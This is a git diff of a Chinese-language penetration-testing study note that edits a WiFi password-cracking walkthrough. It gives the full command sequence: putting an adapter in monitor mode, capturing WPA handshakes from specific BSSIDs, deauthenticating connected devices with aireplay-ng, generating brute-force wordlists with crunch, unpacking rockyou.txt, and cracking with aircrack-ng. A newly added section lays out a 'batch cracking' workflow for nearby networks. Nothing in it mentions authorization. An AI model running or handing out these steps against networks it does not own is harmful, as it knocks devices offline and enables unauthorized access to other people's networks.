修改了 wifi破解的笔记

--- a/docs/note/渗透学习笔记.md
+++ b/docs/note/渗透学习笔记.md
@@ -17,28 +17,12 @@ airodump-ng -c 9 --bssid EC:6C:B5:98:CA:40  -w /home/kail/桌面/handshake wlan0
 
 aireplay-ng -0 10 -a EC:6C:B5:98:CA:40 -c 30:03:C8:3B:D7:C7 wlan0mon 
 
-    0 代表下线; 10 代表攻击10次 ; -a后面是mac地址 ;-c后面是我们上一步抓包的STATION ，代表设备
+    0 代表下线; 10 代表攻击10次 ; -a后面是mac地址 ;-c后面是我们上一步抓包的STATION ，代表设备(选中一个流量跑得快的设备)
 
 当抓包的终端头部出现 ...WPA handshake: EC:6C:B5:98:CA:40...  代表我们抓包成功了！
 会在桌面上生成4-5个文件 ， 我们主要用到.cap文件
-9.  准备字典  使用crunch工具进行 字典生成  优化规则
-/usr/share/crunch/ 找到定义好的字符集  
-1. 28.lalpha-numeric                = [abcdefghijklmnopqrstuvwxyz0123456789]
-2. 40.mixalpha-numeric-all       = [abcdefghijklmnopqrstuvwxypqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
 
-执行生成命令 :
-crunch 8 8 /usr/share/crunch/charset.lst lalpha-numeric 
-根据字符集生成密码 -o START 路径.txt 可以输出文件
-表示 生成最短8个 最长8个 指定字符集规则的文件
-crunch 8 8 /usr/share/crunch/charset.lst mixalpha-numeric-all
-
-crunch 8 8 /usr/share/crunch/charset.lst mixalpha-numeric-all -b 1gb -o START /home/kail/
-//生成指定字符串
-crunch 8 8 abcdefghijklmnopqrstuvwxypqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -b 1gb -o START /home/kail/
-
-crunch 8 8 abcdefghijklmnopqrstuvwxypqrstuvwxyz0123456789 -d 1 -b 1gb -o START /home/kail/
-
-crunch 8 8 0123456789 -b 1gb -o START /home/kail/
+9. 准备字典  生成字典 （如下）
 
 10. 暴力破解 
 
@@ -47,7 +31,62 @@ aircrack-ng -w /home/kail/passwords-1.txt -b EC:6C:B5:98:CA:40 /home/kail/桌面
 
 aircrack-ng -w /root/00000000-99999999.txt -b EC:6C:B5:98:CA:40 /home/kail/桌面/handshake-0*.cap
 跑生成的字典 ： 
-
-
-
     -w 后面是我们放在桌面的字典  -b后面是BSSID地址  以及我们抓包的文件地址
+
+## 准备字典  生成字典
+
+  使用crunch工具进行 字典生成  优化规则
+/usr/share/crunch/ 找到定义好的字符集  
+1. 28.lalpha-numeric                = [abcdefghijklmnopqrstuvwxyz0123456789]
+2. 40.mixalpha-numeric-all       = [abcdefghijklmnopqrstuvwxypqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
+
+执行生成命令 : 
+
+crunch 8 8 /usr/share/crunch/charset.lst lalpha-numeric  
+
+执行这个命令后，Crunch工具将生成一个包含所有可能的8位长度的小写字母和数字组合的密码列表。这个列表可以用于密码破解或测试密码强度。请注意，由于密码长度为8位，生成的密码列表可能非常大，需要一定的时间和资源。生成这个密码字典为3Gb
+
+
+
+根据字符集生成密码 -o START 路径.txt 可以输出文件
+表示 生成最短8个 最长8个 指定字符集规则的文件
+crunch 8 8 /usr/share/crunch/charset.lst mixalpha-numeric-all
+
+crunch 8 8 /usr/share/crunch/charset.lst mixalpha-numeric-all -b 1gb -o START /home/kail/
+
+//生成指定字符串
+crunch 8 8 abcdefghijklmnopqrstuvwxypqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -b 1gb -o START /home/kail/
+
+crunch 8 8 abcdefghijklmnopqrstuvwxypqrstuvwxyz0123456789 -d 1 -b 1gb -o START /home/kail/
+
+crunch 8 8 0123456789 -b 1gb -o START /home/kail/
+
+### kail自带字典   
+
+Kali自带的字典文件在/usr/share/wordlists下，将rockyou.txt.gz解压得到rockyou.txt字典文件（该文件包含一千多万个唯一密码）
+    解压  gzip -d  /usr/share/wordlists/rockyou.txt.gz     
+    解压后文件夹 /usr/share/wordlists/rockyou.txt
+
+
+## 批量破解流程
+
+扫描周边wifi 
+airmon-ng start wlan0 
+airodump-ng wlan0mon
+
+抓包  bssid（mac地址） 和 ch （频段） 也是这里的-c
+airodump-ng -c 6 --bssid F4:84:8D:9A:56:EE -w /home/apple/桌面/handshake wlan0mon
+
+攻击  -a后面是mac地址 ;-c后面是我们上一步抓包的STATION
+aireplay-ng -0 10 -a F4:84:8D:9A:56:EE -c EC:2E:98:93:AF:2F wlan0mon
+
+破解  -w 后面是我们放在桌面的字典  -b后面是BSSID地址  以及我们抓包的文件地址
+aircrack-ng -w /usr/share/wordlists/rockyou.txt -b F4:84:8D:9A:56:EE /home/apple/桌面/handshake-02.cap
+
+## vmware 操作支持 
+
+
+外接wifi 使得虚拟机可以使用外接网卡 
+
+
+虚拟机 - 可移动设备 - 801.11 n wlan(找到插入的网卡) - 连接
